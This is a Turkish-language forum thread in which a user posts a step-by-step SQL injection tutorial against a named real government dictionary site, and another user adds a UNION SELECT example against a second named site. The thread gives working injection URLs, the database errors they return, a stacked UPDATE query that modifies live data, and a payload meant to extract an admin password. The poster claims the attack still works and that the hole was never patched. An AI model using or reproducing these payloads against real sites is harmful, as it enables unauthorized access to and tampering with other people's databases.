SQL INJECTION Nasıl Yapılır Örnek

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tagext
    tagext's avatar
    Üstün Hizmet Madalyası Başarı Madalyası
    Kayıt Tarihi: 25/Temmuz/2002
    Erkek
    eğitim amaçlıdır başkası bu hatayı yaptı siz yapmayın diye yazılmıştır.
    öncelikle sql injection yemesi muhtemel sayfalar asp php gibi kod kontrolunun ek işlemle yapılabildiği sayfalardır. genelde millet buna üşendiği için boyle açıklar bırakıyorlar. öncelikle bir sitede sql açığının olup olmadığını anlamak için boş alanlara tek tırnak girerek yada URL lerdeki id=212 gibi yerlere harf yada tek tırnak koyarak anlarız. bunun sonucunda hata alıyorsanız. o sitede boyle bir açık vardır. gelelim ornek uygulamamıza.

    http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20having%201=1

    adress bara kopyalıyoruz va url ye gidiyoruz. şu hatayı alıcaz.

    URL deki 450 rakamı uydurmadır siz sağlam bi tane sozcuk id si bulun.

    Hata Tipi:Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'adlar.id'
    is invalid in the select list because it is not contained in an
    aggregate function and there is no GROUP BY clause./adsozlugu/ayrinti.asp, line 54


    niye having 1=1 yazdık ona gelelim. having sozcuğu group by ile birlikte kullanılır. ve
    having de tanımlı oğe yok ise
    primary key olan alanı default alır. buda en azından tablo ismi ile primary key olan alanı hataya ekler.
    http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20group%20by%20adlar.id%20having%201=1
    şimdi
    having 1=1 den once  group by adlar.id yi ekledik yine having de
    tanımlı oğe yok şimdi bu seferde şu hatayı alıyoruz.
    Hata Tipi:Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'adlar.adi' is invalid in
    the select list because it is not contained in either an aggregate
    function or the GROUP BY clause./adsozlugu/ayrinti.asp, line 54

    bu sefer ne oldu having de tanımlı oğe yok group by da primary key var. bu sefer ikinci sutunu ekledi yine devam
    ediyoruz bunuda ekliyoruz url ye ve boyle devam ediyoruz.
    http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20group%20by%20adlar.id%20,adlar.adi,adlar.kokeni,adlar.anlami,adlar.adi2,adlar.cinsiyet%20having%201=1

    sonunda hata vermeyene kadar devam ettik ve elimizde full tablo adları var artık.

    artık sql kodlarımızı sokabiliriz. simdi
    http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450

    gidiyoruz ; (noktalı virgül) koyduk tan sonra sql cümlemizi yazıyoruz.

    orenğin
    http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450; update adlar set adlar.anlami='deneme' where adlar.id=450

    sql i salladım siz uygun olanını yaparsınız

    ftw
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Kreston
    Kreston's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 28/Aralık/2002
    Erkek
    abi saat 1.48 ha onuda hatırlatayım da :D

    Zimbabwe
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tagext
    tagext's avatar
    Üstün Hizmet Madalyası Başarı Madalyası
    Kayıt Tarihi: 25/Temmuz/2002
    Erkek
    bu dokumanı başka bir yerde gördüyseniz burdan çalmışlardır. daha simdi kendim yazdım.

    ftw
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Kreston
    Kreston's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 28/Aralık/2002
    Erkek

    yanlış anladın heralde hoja yani biraz saat 2de niye böyle bişey yazdın onu merak ettim :D


    Zimbabwe
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tagext
    tagext's avatar
    Üstün Hizmet Madalyası Başarı Madalyası
    Kayıt Tarihi: 25/Temmuz/2002
    Erkek
    tdk deli etti beni ondan yazdım.
    bu arada yukarıdaki ornek çalışıyor. ama denemeyin tamam mı? :D

    ftw
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    WALLACEs
    WALLACEs's avatar
    Kayıt Tarihi: 17/Eylül/2005
    Erkek

    abi eline sağlık ta ama saate bak gidin yatın yaw. yada irc.tahribat.com 'a girin canımız sıkılıyo orda


     


    TBT'ye Mescit istiyoruz.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ibosoft
    ibosoft's avatar
    Banlanmış Üye
    Kayıt Tarihi: 24/Ağustos/2005
    Erkek

    hid=66%20union // bu 66%20 nedir


    0,0,0,0,0,0 böle şeyler ne anlama geliyo ?


    dizi dizi incisin danalıkta birincisin
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    xeren
    xeren's avatar
    Kayıt Tarihi: 29/Temmuz/2005
    Erkek
    sağol hoca hakkatten çalışoo...
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tagext
    tagext's avatar
    Üstün Hizmet Madalyası Başarı Madalyası
    Kayıt Tarihi: 25/Temmuz/2002
    Erkek
    %20 boşluk manasına geliyor. union ise aynı sutun sayısını döndüren iki sql i bağlar. satır sayıları aynı olsun diye. 0,0... gibi fazladan sutun ekliyolar. union kullanmak için tablo yapısını bilmen lazım. örneğin o sql cümlesi username yi dondurmuyor ise. sen union ile sql i donduren bir cumle yazıyosun. diyelim o sayfa topicname değeri donduruyor sa sen username as topicname diyorsun var boylece ilk topicname alanının üzerine ikinici sql username adını yazıyor. sayfada da username i görüyorsun.

    ftw
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cLust3R
    cLust3R's avatar
    Kayıt Tarihi: 30/Ağustos/2005
    Erkek
    ibosoft bunu yazdı:



    hid=66%20union // bu 66%20 nedir


    0,0,0,0,0,0 böle şeyler ne anlama geliyo ?






    hoja 0,0,0,0,0,0  bnm bildigm  onlar  column  sayısı  normalde tek sıfır koyarsın ,bulamazsa  buldurana kr  eklemeye dewam edersin  0,0,0,0,0,0,0,0,0,0,0,00,0,0,0,0,0,0,0,0,0,0,0    gibi


    örnegin:   www.rapboy.com/profil.php/view&id=44=-1+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+users+where+id=44    bulana  kdr  sıfırları  artırıcn..    profil  kartından  adminin  şifresini mesela  id=44  adminin   id si  dr.  örnegin yani 

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek
    dava açmasınalar m.q :D tagext in 3 ay once uyarmasına rağmen hala bu acık var ve foruma 1 ay sonrasında yayınlandı yani 4aydır bu acık devam ediyor. kapatmadılar. illa gel hergün zik at diyorlar. ama nabalım yüce devletimizin sitesi :))
Toplam Hit: 18961 Toplam Mesaj: 21